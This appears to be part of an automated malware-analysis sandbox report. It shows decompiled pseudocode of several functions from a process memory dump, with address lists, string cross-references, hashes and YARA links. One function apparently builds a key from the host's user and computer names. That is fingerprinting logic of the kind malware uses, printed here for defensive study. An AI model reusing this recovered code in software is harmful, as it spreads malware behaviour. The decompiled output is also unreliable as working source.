									_t224 = 0;
								}
							}
							_v28 = _t224;
						}
						_t247 = _t247 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t247 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t242 = 0;
					_v36 = _t225 + 1;
					while(1) {
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						L001C03B6();
						_push(_t203);
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						_v8 = _t203;
						_push(_v36);
						L001C04AE();
						_t249 = _t249 + 0x10;
						if(_t203 == 0) {
							break;
						}
						_t242 = _t242 + 1;
						if(_t242 < 6) {
							continue;
						}
						_t207 = _a8;
						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
								_push(_t209);
								_v40 = _t209;
								L001C03B6();
								_t243 = _t209;
								_push(_t243);
								_push(_v40);
								_push(_v36);
								L001C04AE();
								_t249 = _t249 + 0x10;
								if(_t209 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
							_t224 = _t224 + 1;
							_t247 = _t247 + _t243 + 1;
							goto L43;
						}
						_t128 = _t207 + 2; // 0x2
						_t244 = _t247 + _t128;
						_t230 =  *_t244;
						if(_t230 == 0x78 || _t230 == 0x58) {
							_t159 = _t207 + 3; // 0x3
							_t238 = _t247 + _t159;
							_t231 = _t238;
							_t245 = 0;
							while(1) {
								_t212 =  *_t231;
								if(_t212 == 0) {
									break;
								}
								if(_t212 == 0x3b) {
									L27:
									if(_t245 <= 0) {
										goto L29;
									}
									_push(_t245);
									_push(_t238);
									_push( &_v88);
									L001C043C();
									 *((char*)(_t248 + _t245 - 0x54)) = 0;
									_t215 = E001B5384( &_v88,  &_v88);
									_t249 = _t249 + 0x10;
									 *((char*)(_t224 + _a4)) = _t215;
									_t224 = _t224 + 1;
									_t247 = _t247 + _t245 + 4;
									goto L43;
								}
								_t245 = _t245 + 1;
								if(_t245 >= 4) {
									break;
								}
								_t231 = _t231 + 1;
							}
							_t245 = _t245 | 0xffffffff;
							goto L27;
						} else {
							_t233 = _t244;
							_t239 = 0;
							while(1) {
								_t216 =  *_t233;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									_v8 = _t239;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									L001C043C();
									 *((char*)(_t248 + _v8 - 0x48)) = 0;
									_t219 =  &_v76;
									L001C0430();
									_t249 = _t249 + 0x10;
									_v32 = _t219;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
									 *((char*)(_t224 + _a4)) = _v12;
									_t224 = _t224 + 1;
									_t247 = _t247 + _v8 + 3;
									goto L43;
								}
								_t239 = _t239 + 1;
								if(_t239 >= 6) {
									break;
								}
								_t233 = _t233 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
					_t224 = _t224 + 1;
					_t247 = _t247 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}

0x001be685
0x001be68c
0x001be693
0x001be69a
0x001be6a1
0x001be6a8
0x001be6af
0x001be6b3
0x001be6b7
0x001be6bb
0x001be6bf
0x001be6c3
0x001be6c7
0x001be6d1
0x001be6db
0x001be6e5
0x001be6ef
0x001be6f9
0x001be703
0x001be70d
0x001be717
0x001be721
0x001be72b
0x001be735
0x001be73f
0x001be749
0x001be753
0x001be75d
0x001be767
0x001be771
0x001be77b
0x001be785
0x001be78f
0x001be799
0x001be7a3
0x001be7ad
0x001be7b7
0x001be7c1
0x001be7cb
0x001be7d5
0x001be7df
0x001be7e9
0x001be7f3
0x001be7fd
0x001be807
0x001be811
0x001be81b
0x001be825
0x001be82f
0x001be839
0x001be843
0x001be84d
0x001be857
0x001be861
0x001be86b
0x001be875
0x001be87f
0x001be889
0x001be893
0x001be89d
0x001be8a7
0x001be8b1
0x001be8bb
0x001be8c5
0x001be8cf
0x001be8d9
0x001be8e3
0x001be8ed
0x001be8f7
0x001be901
0x001be90b
0x001be915
0x001be91f
0x001be929
0x001be933
0x001be93d
0x001be947
0x001be951
0x001be95b
0x001be965
0x001be968
0x001be96c
0x001be96e
0x001be972
0x001be97c
0x001be986
0x001be990
0x001be99a
0x001be9a4
0x001be9ae
0x001be9b8
0x001be9c2
0x001be9cc
0x001be9d6
0x001be9e0
0x001be9ea
0x001be9f4
0x001be9fe
0x001bea08
0x001bea12
0x001bea1c
0x001bea23
0x001bea2a
0x001bea31
0x001bea38
0x001bea3f
0x001bea46
0x001bea4d
0x001bea54
0x001bea5b
0x001bea62
0x001bea69
0x001bec57
0x001bec5a
0x001bec60
0x001bec63
0x001bec76
0x001bec6f
0x001bec6f
0x00000000
0x001bec6f
0x001bec63
0x001bea70
0x001bea7f
0x001bea82
0x001bea86
0x001bea89
0x001bec06
0x001bec0a
0x001bec44
0x001bec47
0x001bec10
0x001bec13
0x001bec18
0x001bec1c
0x001bec21
0x001bec28
0x001bec28
0x001bec21
0x001bec2a
0x001bec2a
0x001bec48
0x001bec49
0x001bec49
0x001bec50
0x00000000
0x00000000
0x00000000
0x001bec50
0x001bea8f
0x001bea92
0x001bea95
0x001bea95
0x001bea99
0x001bea9e
0x001bea9f
0x001beaa3
0x001beaa6
0x001beaa9
0x001beaae
0x001beab3
0x00000000
0x00000000
0x001beab5
0x001beab9
0x00000000
0x00000000
0x001beabb
0x001beac3
0x001bebce
0x001bebce
0x001bebd2
0x001bebd5
0x001bebdc
0x001bebdd
0x001bebe0
0x001bebe5
0x001bebe7
0x001bebe8
0x001bebeb
0x001bebee
0x001bebf3
0x001bebf8
0x00000000
0x00000000
0x001bebfa
0x001bec01
0x00000000
0x00000000
0x001bec03
0x00000000
0x001bec03
0x001bec37
0x001bec3a
0x001bec3b
0x00000000
0x001bec3b
0x001beac9
0x001beac9
0x001beacd
0x001bead2
0x001beb83
0x001beb83
0x001beb87
0x001beb89
0x001beb98
0x001beb98
0x001beb9c
0x00000000
0x00000000
0x001beb8f
0x001beba1
0x001beba3
0x00000000
0x00000000
0x001beba5
0x001beba6
0x001bebaa
0x001bebab
0x001bebb4
0x001bebb9
0x001bebc1
0x001bebc4
0x001bebc7
0x001bebc8
0x00000000
0x001bebc8
0x001beb91
0x001beb95
0x00000000
0x00000000
0x001beb97
0x001beb97
0x001beb9e
0x00000000
0x001beae1
0x001beae1
0x001beae3
0x001beb09
0x001beb09
0x001beb0d
0x00000000
0x00000000
0x001beb00
0x001beb7e
0x001beb13
0x001beb17
0x00000000
0x00000000
0x001beb25
0x001beb2d
0x001beb32
0x001beb36
0x001beb3b
0x001beb46
0x001beb55
0x001beb5d
0x001beb5e
0x001beb62
0x001beb6e
0x001beb74
0x001beb75
0x00000000
0x001beb75
0x001beb02
0x001beb06
0x00000000
0x00000000
0x001beb08
0x001beb08
0x001beb0f
0x00000000
0x001beb0f
0x001bead2
0x001beaee
0x001beaf4
0x001beaf5
0x00000000
0x001beaf5
0x00000000

Strings

P@A, xrefs: 001BE7B7
x?A, xrefs: 001BE69A
pBA, xrefs: 001BEA54
XBA, xrefs: 001BEA3F
0AA, xrefs: 001BE8CF
pAA, xrefs: 001BE91F
8AA, xrefs: 001BE8D9
hBA, xrefs: 001BEA4D
?A, xrefs: 001BE72B
PBA, xrefs: 001BEA38
@A, xrefs: 001BE86B
`AA, xrefs: 001BE90B
XAA, xrefs: 001BE901
0@A, xrefs: 001BE78F
t?A, xrefs: 001BE693
8BA, xrefs: 001BEA23
x@A, xrefs: 001BE7E9
`BA, xrefs: 001BEA46
xAA, xrefs: 001BE929
PAA, xrefs: 001BE8F7
AA, xrefs: 001BE8BB
X@A, xrefs: 001BE7C1
@AA, xrefs: 001BE8E3
H@A, xrefs: 001BE7AD
p@A, xrefs: 001BE7DF
xBA, xrefs: 001BEA5B
(BA, xrefs: 001BEA12
@BA, xrefs: 001BEA2A
8@A, xrefs: 001BE799
(@A, xrefs: 001BE785
p?A, xrefs: 001BE68C
@A, xrefs: 001BE77B
HBA, xrefs: 001BEA31
hAA, xrefs: 001BE915
?A, xrefs: 001BE735
`@A, xrefs: 001BE7CB
AA, xrefs: 001BE9B8
@A, xrefs: 001BE875
0BA, xrefs: 001BEA1C
HAA, xrefs: 001BE8ED
h@A, xrefs: 001BE7D5
AA, xrefs: 001BE9C2
h?A, xrefs: 001BE685
@@A, xrefs: 001BE7A3
(AA, xrefs: 001BE8C5
BA, xrefs: 001BEA08

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
API String ID: 0-2473593039
Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
Instruction ID: a2f117b57e79993c4b2ce617adcc369652e25a6f4d35e8d5df027362a5c9b273
Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
Instruction Fuzzy Hash: 83F145B0800259DEDB21CF95D9487DEBFF0AB96308F5481CAD5593B241C7B94AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 001B1478, Relevance: 10.1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E001B1478(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t57;
				void* _t58;
				void* _t65;
				void* _t68;
				void* _t71;
				void* _t84;
				signed int _t87;
				void* _t89;
				signed int _t93;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t111;

				_t111 = __fp0;
				_t89 = __ecx;
				_t100 = _t102 - 0x6c;
				_t103 = _t102 - 0x474;
				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
				_t87 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t100 - 0x63);
					 *((char*)(_t100 - 0x64)) = 0;
					L001C03F4();
					_push(_t100 - 0x64);
					_t93 = _t87 << 2;
					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
					_push( *((intOrPtr*)(_t100 + 0x78)));
					_t57 = 0x7f;
					_t58 = E001BD9F2(_t57, _t89);
					_t103 = _t103 + 0x18;
					if(_t58 == 0) {
						E001B104A(_t100 - 0x408);
						_push(_t100 - 0x64);
						_push(_t100 - 0x1f4);
						L001C03FA();
						_t97 =  *((intOrPtr*)(_t100 + 0x78));
						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
						_t34 = _t87 + 1; // 0x1
						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
						_push(_t100 - 0x2f8);
						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
						_push(_t97);
						_t65 = 0x7f;
						E001BD9F2(_t65, _t89);
						_push(_t100 - 0x3fc);
						_push(0x41274c);
						_push(_t97);
						_t68 = 0x7f;
						E001BD9F2(_t68, _t89);
						_push(_t100 - 0x378);
						_push(0x412760);
						_push(_t97);
						_t71 = 0x7f;
						E001BD9F2(_t71, _t89);
						_t105 = _t103 + 0x2c;
						if(_t87 != 3) {
							_push(_t100 - 0x278);
							_push(0x412664);
							_push(_t97);
							_t84 = 0x7f;
							E001BD9F2(_t84, _t89);
							_t105 = _t105 + 0xc;
						}
						E001BD9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
						E001BD9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
						_t103 = _t105 + 0x18;
						_t98 =  *((intOrPtr*)(_t100 + 0x74));
						E001B12DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
						_push(_t98 + 0xa9c);
						_push(_t100 - 0xf4);
						L001C03FA();
						_pop(_t89);
						_t58 = E001B1279(_t100 - 0x408, _t111, _t98);
					}
					_t87 = _t87 + 1;
				} while (_t87 < 4);
				return _t58;
			}

0x001b1478
0x001b1478
0x001b1479
0x001b147d
0x001b1486
0x001b148d
0x001b1494
0x001b149b
0x001b14a2
0x001b14a9
0x001b14b0
0x001b14b7
0x001b14be
0x001b14c5
0x001b14cc
0x001b14d3
0x001b14da
0x001b14e1
0x001b14e8
0x001b14ef
0x001b14f6
0x001b14fd
0x001b1504
0x001b150b
0x001b1512
0x001b1514
0x001b1514
0x001b1519
0x001b151b
0x001b151c
0x001b1520
0x001b1528
0x001b152b
0x001b152e
0x001b1532
0x001b1537
0x001b1538
0x001b153d
0x001b1542
0x001b154e
0x001b1556
0x001b155d
0x001b155e
0x001b1566
0x001b1569
0x001b156f
0x001b1572
0x001b157e
0x001b157f
0x001b1583
0x001b1586
0x001b1587
0x001b1592
0x001b1593
0x001b1598
0x001b159b
0x001b159c
0x001b15a7
0x001b15a8
0x001b15ad
0x001b15b0
0x001b15b1
0x001b15b6
0x001b15bc
0x001b15c4
0x001b15c5
0x001b15ca
0x001b15cd
0x001b15ce
0x001b15d3
0x001b15d3
0x001b15df
0x001b15ed
0x001b15f2
0x001b1603
0x001b1608
0x001b1613
0x001b161a
0x001b161b
0x001b1621
0x001b1629
0x001b1629
0x001b162e
0x001b162f
0x001b163f

Strings

,&A, xrefs: 001B149B
&A, xrefs: 001B14F6
p&A, xrefs: 001B14BE
<&A, xrefs: 001B14A2
H&A, xrefs: 001B14A9
4'A, xrefs: 001B150B
T&A, xrefs: 001B14B0
d&A, xrefs: 001B14B7

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
API String ID: 0-3237638986
Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
Instruction ID: 718aca446e375c4cf331b9c33a5d6dec3cf1fb358c9482c352ef34dd1d6c7bd4
Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
Instruction Fuzzy Hash: 7B4170B290021CAFDF20DF90DD85ADE3BA8EF24308F504566F918D7191D7B89A98CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001B60BE, Relevance: 8.9, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E001B60BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L001C03F4();
				_v548 = 0;
				L001C03F4();
				_v1572 = 0;
				L001C03F4();
				_v1060 = 0;
				L001C03F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0;
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L001C03B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L001C03B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L001C043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}

0x001b60cf
0x001b60da
0x001b60de
0x001b60e2
0x001b60e6
0x001b60ea
0x001b60ee
0x001b60f2
0x001b60f6
0x001b60fa
0x001b60fe
0x001b6102
0x001b6106
0x001b610a
0x001b610e
0x001b6112
0x001b6116
0x001b611a
0x001b6120
0x001b612e
0x001b6134
0x001b6147
0x001b614e
0x001b615c
0x001b6163
0x001b616e
0x001b617f
0x001b6182
0x001b6185
0x001b6196
0x001b6199
0x001b619f
0x001b61b8
0x001b61cd
0x001b61cf
0x001b61d5
0x001b61d6
0x001b61db
0x001b61de
0x001b61e4
0x001b61e5
0x001b61ea
0x001b61ed
0x001b61f0
0x001b61f5
0x001b61f6
0x001b61f7
0x001b6202
0x001b6207
0x001b6209
0x001b620f
0x001b6212
0x001b6218
0x001b621e
0x001b621e
0x001b6222
0x001b6225
0x001b622e
0x001b6230
0x001b6237
0x001b6238
0x001b620f
0x001b6240
0x001b6242
0x001b6245
0x001b624b
0x001b6251
0x001b6251
0x001b625a
0x001b625d
0x001b6266
0x001b6268
0x001b626b
0x001b626c
0x001b6242
0x001b6275

Strings

b, xrefs: 001B60EE
H, xrefs: 001B6116
i, xrefs: 001B60E6
}, xrefs: 001B6106
O, xrefs: 001B610A
5, xrefs: 001B6102
}, xrefs: 001B6112

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5$H$O$b$i$}$}
API String ID: 0-3760989150
Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
Instruction ID: 6edef6c8c97fbb99964922d67838d826a99654a0f2c2e0599ee56187fc219ae5
Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
Instruction Fuzzy Hash: 4E51B47180029DEEDB11CBA8CC40EEEBBBCFF59314F0442E9E559A6191D3389B84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 001B1642, Relevance: 8.9, Strings: 7, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E001B1642(void* __fp0) {
				void* __esi;
				void* _t65;
				signed int _t89;
				void* _t92;
				intOrPtr _t106;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t118;

				_t118 = __fp0;
				_t108 = _t110 - 0x70;
				_t111 = _t110 - 0x474;
				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
				_t89 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t108 - 0x5f);
					 *((char*)(_t108 - 0x60)) = 0;
					L001C03F4();
					_t111 = _t111 + 0xc;
					_t97 = _t89 << 2;
					_t65 = E001B1819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
					if(_t65 != 0) {
						E001B104A(_t108 - 0x404);
						_push(_t108 - 0x60);
						_push(_t108 - 0x1f0);
						L001C03FA();
						_pop(_t92);
						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
						_t37 = _t89 + 1; // 0x1
						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
						E001B1819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
						E001B1819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
						E001B1819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
						if(_t89 != 3) {
							E001B1819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
							E001BD9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
							_t111 = _t111 + 0xc;
						}
						E001BD9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
						E001BD9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
						_t106 =  *((intOrPtr*)(_t108 + 0x78));
						_t111 = _t111 + 0x18;
						E001B12DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
						_push(_t106 + 0xa9c);
						_push(_t108 - 0xf0);
						L001C03FA();
						_t65 = E001B1279(_t108 - 0x404, _t118, _t106);
					}
					_t89 = _t89 + 1;
				} while (_t89 < 4);
				return _t65;
			}

0x001b1642
0x001b1643
0x001b1647
0x001b1650
0x001b1657
0x001b165e
0x001b1665
0x001b166c
0x001b1673
0x001b167a
0x001b1681
0x001b1688
0x001b168f
0x001b1696
0x001b169d
0x001b16a4
0x001b16ab
0x001b16b2
0x001b16b9
0x001b16c0
0x001b16c7
0x001b16ce
0x001b16d5
0x001b16dc
0x001b16de
0x001b16de
0x001b16e3
0x001b16e5
0x001b16e6
0x001b16ea
0x001b16ef
0x001b16f4
0x001b1701
0x001b1708
0x001b1714
0x001b171c
0x001b1723
0x001b1724
0x001b1733
0x001b1738
0x001b1741
0x001b174a
0x001b1750
0x001b1763
0x001b1776
0x001b177e
0x001b178e
0x001b179f
0x001b17a4
0x001b17a4
0x001b17b2
0x001b17c2
0x001b17c7
0x001b17ca
0x001b17df
0x001b17ea
0x001b17f1
0x001b17f2
0x001b1800
0x001b1800
0x001b1805
0x001b1806
0x001b1816

Strings

(A, xrefs: 001B16CE
t'A, xrefs: 001B1650
'A, xrefs: 001B1696
<&A, xrefs: 001B1688
d&A, xrefs: 001B169D
4(A, xrefs: 001B16D5
H&A, xrefs: 001B168F

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
API String ID: 0-2857912252
Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
Instruction ID: 142eb0f3593b68c4f8298c77180c15eb55c320e5b4fd3ace17b7be07e52145da
Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
Instruction Fuzzy Hash: 665159B190025DAFDF25EF60CD45ADD3BB8FF14308F50806AF928A6151D3B599A9CF88

Uniqueness

Uniqueness Score: -1.00%

Function 001B2E88, Relevance: 6.3, Strings: 5, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B2E88(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t59;

				_t60 = __edi;
				E001B7340(__edi, __eflags);
				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
				_t5 = _t60 + 0x1e0; // 0x1e0
				_t49 = _t5;
				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
				 *_t49 = 0x413754;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 4)) = 0;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t49 + 0xc)) = 0;
				 *_t49 = 0x413760;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
				_t13 = _t60 + 0x1f8; // 0x1f8
				_t50 = _t13;
				 *((intOrPtr*)(_t50 + 4)) = 0;
				 *((intOrPtr*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = 0;
				 *((intOrPtr*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = 0;
				 *((intOrPtr*)(_t50 + 0x18)) = 0;
				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
				 *_t50 = 0;
				_t21 = _t60 + 0x630; // 0x630
				_t51 = _t21;
				 *((intOrPtr*)(_t51 + 8)) = 0x20;
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((char*)(__edi + 0x52a)) = 0;
